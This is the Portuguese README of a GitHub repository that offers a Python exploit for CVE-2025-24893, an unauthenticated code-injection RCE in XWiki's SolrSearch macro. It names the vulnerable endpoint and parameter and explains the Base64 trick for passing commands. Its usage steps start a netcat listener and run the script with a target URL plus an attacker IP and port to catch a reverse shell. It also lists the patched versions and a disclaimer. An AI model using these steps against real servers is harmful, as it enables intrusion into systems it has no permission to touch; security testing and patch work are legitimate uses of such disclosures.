hasecto/CVE-2025-24893

# CVE-2025-24893 Exploit de Execução Remota de Código (RCE) no XWiki Um exploit em Python3 para a **CVE-2025-24893**, uma vulnerabilidade crítica de Execução Remota de Código Não Autenticada (RCE) que afeta a plataforma **XWiki**. Este script explora uma falha de Injeção de Código/Expressão (CWE-95) dentro do componente da macro `SolrSearch`. A falha permite que atacantes executem código Groovy/Java arbitrário no sistema operacional subjacente. O exploit realiza automaticamente a codificação em Base64 para evitar as limitações de interpretação de comandos da função `Runtime.getRuntime().exec()` do Java. ## 📊 Detalhes da Vulnerabilidade - **CVE ID:** CVE-2025-24893 - **Pontuação CVSS:** 9.8 Crítica (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) - **CWE:** CWE-95 (Improper Neutralization of Expression Language Expression / Eval Injection) - **Componente Alvo:** `/bin/get/Main/SolrSearch` (através do parâmetro `text`) ## 🔍 Versões Afetadas - Todas as versões a partir da **5.3-milestone-2** até a **15.10.10** - Versões **16.0.0-rc-1** até a **16.4.0** ## 🚀 Como Usar ### 1. Inicie o seu listener (Netcat) no Kali Linux: nc -lvnp 4444 ### 2. Execute o exploit: python3 CVE-2025-24-893.py **Exemplo:** python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444 ## 🛠️ Requisitos - Python 3.x - Biblioteca `requests` Para instalar a dependência necessária: pip install requests ## 🛡️ Correção Atualize a sua instância do XWiki para uma das versões oficiais corrigidas: **15.10.11**, **16.4.1**, **16.5.0-rc-1** (ou superiores). ## ⚠️ Aviso Legal (Disclaimer) Este script foi desenvolvido exclusivamente para fins educacionais, auditorias de segurança autorizadas e testes de invasão (Pentest). O autor não se responsabiliza por qualquer uso indevido, danos ou atividades ilegais causadas por esta ferramenta. A utilização deste script contra alvos sem autorização prévia é estritamente ilegal.